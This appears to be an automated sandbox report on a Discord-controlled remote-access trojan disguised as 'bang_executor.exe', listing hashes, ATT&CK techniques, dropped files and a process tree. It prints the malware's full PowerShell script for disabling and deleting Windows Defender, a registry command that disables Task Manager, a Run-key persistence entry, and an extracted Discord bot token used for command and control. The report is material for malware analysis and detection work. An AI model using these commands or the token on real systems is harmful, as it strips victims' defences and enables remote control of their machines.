discordrat | f30580d896f81b395049c5dd97eba5cfe786d815aa8d45df8cd1e782ee2de58f

Analysis

max time kernel
54s
max time network
16s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
20/02/2024, 01:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bang_executor.exe
Size

664KB
MD5

10185ad8a3e6917c2f81ec3094b66e8e
SHA1

9c3282bb6d64274182e1202d10d82df43ab69fd6
SHA256

f30580d896f81b395049c5dd97eba5cfe786d815aa8d45df8cd1e782ee2de58f
SHA512

88436979af01ca8402bd15aa6ed2024151112c930868f78364d340117f715e0d9383d919623dcf6547f0038b27f90ede257d62db17e9ee2060eae743d05b2347
SSDEEP

6144:3E+yclwQKjdn+WPtYVJIoBf4xX26I6DqJMeRzBrvQNQ5rHeIOohWy0yf:3BdlwHRn+WlYV+Rp2yEMeRzdvY+Oov

Score

10^/10

discordrat evasion persistence rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTIwODA1NzI2MjQwNTQ1MTgxNg.GHdoEv._ZZxMSdlA1-6GNUWIkOqA45H5x0bHFbTgSRFuM
server_id
1097447165732868126

Signatures

Contains code to disable Windows Defender 3 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/files/0x0035000000014588-32.dat	disable_win_def
behavioral1/memory/2600-87-0x0000000000A40000-0x0000000000A8A000-memory.dmp	disable_win_def
behavioral1/files/0x0006000000015c9c-100.dat	disable_win_def

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Parameters	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Security	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\TriggerInfo\0	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\TriggerInfo	powershell.exe

Disables Task Manager via registry modification
evasion

Executes dropped EXE 2 IoCs

pid	Process
2884	bang_executor.exe
2600	executer.exe

Loads dropped DLL 8 IoCs

pid	Process
2572	cmd.exe
2572	cmd.exe
2572	cmd.exe
2124	WerFault.exe
2124	WerFault.exe
2124	WerFault.exe
2124	WerFault.exe
2124	WerFault.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\bang_executor = "C:\\path\\to\\bang_executor.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1792	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1792	powershell.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 1804 wrote to memory of 2572	1804	bang_executor.exe	28
PID 1804 wrote to memory of 2572	1804	bang_executor.exe	28
PID 1804 wrote to memory of 2572	1804	bang_executor.exe	28
PID 1804 wrote to memory of 2572	1804	bang_executor.exe	28
PID 2572 wrote to memory of 2884	2572	cmd.exe	30
PID 2572 wrote to memory of 2884	2572	cmd.exe	30
PID 2572 wrote to memory of 2884	2572	cmd.exe	30
PID 2572 wrote to memory of 2884	2572	cmd.exe	30
PID 2572 wrote to memory of 2600	2572	cmd.exe	32
PID 2572 wrote to memory of 2600	2572	cmd.exe	32
PID 2572 wrote to memory of 2600	2572	cmd.exe	32
PID 2572 wrote to memory of 2600	2572	cmd.exe	32
PID 2572 wrote to memory of 2744	2572	cmd.exe	31
PID 2572 wrote to memory of 2744	2572	cmd.exe	31
PID 2572 wrote to memory of 2744	2572	cmd.exe	31
PID 2572 wrote to memory of 2744	2572	cmd.exe	31
PID 2572 wrote to memory of 1976	2572	cmd.exe	33
PID 2572 wrote to memory of 1976	2572	cmd.exe	33
PID 2572 wrote to memory of 1976	2572	cmd.exe	33
PID 2572 wrote to memory of 1976	2572	cmd.exe	33
PID 2572 wrote to memory of 2728	2572	cmd.exe	40
PID 2572 wrote to memory of 2728	2572	cmd.exe	40
PID 2572 wrote to memory of 2728	2572	cmd.exe	40
PID 2572 wrote to memory of 2728	2572	cmd.exe	40
PID 2572 wrote to memory of 2492	2572	cmd.exe	35
PID 2572 wrote to memory of 2492	2572	cmd.exe	35
PID 2572 wrote to memory of 2492	2572	cmd.exe	35
PID 2572 wrote to memory of 2492	2572	cmd.exe	35
PID 2492 wrote to memory of 2824	2492	cmd.exe	41
PID 2492 wrote to memory of 2824	2492	cmd.exe	41
PID 2492 wrote to memory of 2824	2492	cmd.exe	41
PID 2492 wrote to memory of 2824	2492	cmd.exe	41
PID 2492 wrote to memory of 2964	2492	cmd.exe	42
PID 2492 wrote to memory of 2964	2492	cmd.exe	42
PID 2492 wrote to memory of 2964	2492	cmd.exe	42
PID 2492 wrote to memory of 2964	2492	cmd.exe	42
PID 2744 wrote to memory of 2716	2744	cmd.exe	43
PID 2744 wrote to memory of 2716	2744	cmd.exe	43
PID 2744 wrote to memory of 2716	2744	cmd.exe	43
PID 2744 wrote to memory of 2716	2744	cmd.exe	43
PID 2492 wrote to memory of 1884	2492	cmd.exe	44
PID 2492 wrote to memory of 1884	2492	cmd.exe	44
PID 2492 wrote to memory of 1884	2492	cmd.exe	44
PID 2492 wrote to memory of 1884	2492	cmd.exe	44
PID 2600 wrote to memory of 772	2600	executer.exe	45
PID 2600 wrote to memory of 772	2600	executer.exe	45
PID 2600 wrote to memory of 772	2600	executer.exe	45
PID 2600 wrote to memory of 1876	2600	executer.exe	47
PID 2600 wrote to memory of 1876	2600	executer.exe	47
PID 2600 wrote to memory of 1876	2600	executer.exe	47
PID 1876 wrote to memory of 1792	1876	cmd.exe	49
PID 1876 wrote to memory of 1792	1876	cmd.exe	49
PID 1876 wrote to memory of 1792	1876	cmd.exe	49
PID 2884 wrote to memory of 2124	2884	bang_executor.exe	50
PID 2884 wrote to memory of 2124	2884	bang_executor.exe	50
PID 2884 wrote to memory of 2124	2884	bang_executor.exe	50

C:\Users\Admin\AppData\Local\Temp\bang_executor.exe
"C:\Users\Admin\AppData\Local\Temp\bang_executor.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2572
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe
    bang_executor.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2884
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2884 -s 596
      4⤵
      Loads dropped DLL
      PID:2124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K mgr.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2744
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      PID:2716
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\executer.exe
    executer.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2600
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" > test.ps1
      4⤵
      PID:772
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1876
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ep bypass .\test.ps1;
        5⤵
        Modifies security service
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K save.bat
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K install.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2492
  - - C:\Windows\SysWOW64\reg.exe
      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
      4⤵
      PID:2824
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /i /c:"bang_executor"
      4⤵
      PID:2964
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "bang_executor" /t REG_SZ /d "C:\path\to\bang_executor.exe" /f
      4⤵
      Adds Run key to start application
      PID:1884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K save2.bat
    3⤵
    PID:2728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\CopyMyApps.bat

Filesize
1KB

MD5
55351d160c3605dae99795a51ae23e3c

SHA1
dbde0cf6a382c58d474b360dee46202a3090120c

SHA256
c12ed788963d78593ece817c2cae0f5e68cfb64291d7907f72dd932127843897

SHA512
984c54dcedfbe35651b681ae7cdacc018a148470b3aff4514cab4e4ffbc4d30ec6cc99d1b2c2056f51c8b099058799a398e7e10b84948f8c26b07a3f90f932c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang.bat

Filesize
133B

MD5
f28a28ee04c94b29d345bc4523efb22b

SHA1
65278275f0ccba860834e2fc7d79b43af9183c01

SHA256
fa76f189c8e97a2c5e80a0ef17516433b86c8f9ae6dca34a7b8cd032ffb1825d

SHA512
a11d1b25d39340b7d42ce274e507db556c1a2bacf3883467f837bfaaa12fcbb8c14ebb66c1cf4bfc17f70ca2ac37f0a43641564055063889aad2683e9c1c5f9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe

Filesize
343KB

MD5
957d280e645a7e9d49368e118ec7a2aa

SHA1
29c65cc040d4c1018a0d9b1c99f413b173743f25

SHA256
f98251050111f9adaa65b84bf026c38b4f66d626ef36dbd63efe1bc8d2821504

SHA512
9179772b44383635856306872d3db8ee682edc736e1b40bf7c9221d0a42bcd739aa24241a2e298efa5035abad80621cff778423847672866fef69e9596124c38

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\executer.exe

Filesize
274KB

MD5
88e22186f196cc0e1e2d500eeac57337

SHA1
e5e0bd98f08de159880b58e918959c358efca6b1

SHA256
5dca36ce98da2185693a87305811cf7aeee7b3279298345e4d1f4d37efe0250b

SHA512
462fe680ba12da5fedec11d88ea17f9f65b80ee916f665d6208d9dcf3d3494c805d11aaf899914f621835b0a61d014000243fe01b2e00ca34681afc415a33ee6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\install.bat

Filesize
511B

MD5
94bb870028b1a0695d7d2bfb4e828d23

SHA1
792db68c70ace16ff72f77a38de1fc2af87ea9c6

SHA256
f4cb0914def1ae78c54397280170edf6c76085133fe00e26a3778fd0ebd3e54f

SHA512
746a7535078ba0361b207145ec856f2c9fa8a29ff1314459b5a09f14ac3e97cae4ec3209c4e06f730f434abf579e5b4859474b5ec916263e3cd7aeb7bb20205b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\mgr.bat

Filesize
111B

MD5
9a4a032d9a604c9b7c1e843c6455140e

SHA1
dbe7a610e1697e62722efb59ad3bc03afcfd900f

SHA256
dc0890d3d4a7370ece704eb075c05418795c47332dffcc277896e806c38c3db0

SHA512
ca045ec576eb55c442959c2709148392fe53f1613b6c5dc9cb5b43592d77563479233c7dee6e0832e5a95528e1653ba6b73c73a3dc4ed841a7529e6344eccb3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\save.bat

Filesize
3KB

MD5
ba3f50ba4f5d0c5289f3ed88a97417b8

SHA1
140bb3017cd0a71de9075132e0c1b0b2a2e0f7bd

SHA256
3767ea473e9aa362013d6daada1a418de045c4c6d48129d80113fa2cf17b83c6

SHA512
39431d8969a4f8fd534d719a498e1363824912f9955b4089ee692c703f06a6b43b0aabaa394e2e6d6950d215d573ad90566a60ee350ca2be91734bdc194e7109

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\save2.bat

Filesize
1KB

MD5
39273529b1318600582d458a55a853f1

SHA1
11ab160257103c8e576a80d4aa2dfc16045491a6

SHA256
19c54853770804e2d9e7038bd12d615f942f80a197dd9871beb9385ff37752a7

SHA512
ce13c7a4d0714145952cd7453b8179c2b7b38672a6669585b84f4b7449458075da73b590676e8873e2d8b53ccc035e6e5c5ed69a155873e9138246fb7d973ca6

Download Submit
C:\test.ps1

Filesize
3KB

MD5
3499745c76f31429c42a3b34d8cc0af6

SHA1
f9125070406cc2a2a6cf092f3ed3d36751107224

SHA256
3c2eb503e7d32f48b06199e6c1c350e559c316fd9f6f17f040e41079f44fb6e3

SHA512
1757ee5f42a8681e84ce3070d7ee164107ebc284bc0eb5424a4e71fe71e122eeadb28d63535d88557c0c49c687ce4514e8d387781ec7c68e1171994183dde1fb

Download Submit
memory/1792-96-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/1792-99-0x0000000002D90000-0x0000000002E10000-memory.dmp

Filesize
512KB

Download
memory/1792-110-0x000007FEEE5F0000-0x000007FEEEF8D000-memory.dmp

Filesize
9.6MB

Download
memory/1792-104-0x0000000002D90000-0x0000000002E10000-memory.dmp

Filesize
512KB

Download
memory/1792-97-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

Filesize
32KB

Download
memory/1792-98-0x000007FEEE5F0000-0x000007FEEEF8D000-memory.dmp

Filesize
9.6MB

Download
memory/1792-101-0x000007FEEE5F0000-0x000007FEEEF8D000-memory.dmp

Filesize
9.6MB

Download
memory/1792-102-0x0000000002D90000-0x0000000002E10000-memory.dmp

Filesize
512KB

Download
memory/1792-103-0x0000000002D90000-0x0000000002E10000-memory.dmp

Filesize
512KB

Download
memory/2600-87-0x0000000000A40000-0x0000000000A8A000-memory.dmp

Filesize
296KB

Download
memory/2600-91-0x000007FEF5AA0000-0x000007FEF648C000-memory.dmp

Filesize
9.9MB

Download
memory/2884-90-0x000007FEF5AA0000-0x000007FEF648C000-memory.dmp

Filesize
9.9MB

Download
memory/2884-88-0x000000013FDB0000-0x000000013FE0A000-memory.dmp

Filesize
360KB

Download
memory/2884-111-0x000007FEF5AA0000-0x000007FEF648C000-memory.dmp

Filesize
9.9MB

Download
memory/2884-112-0x000007FEF5AA0000-0x000007FEF648C000-memory.dmp

Filesize
9.9MB

Download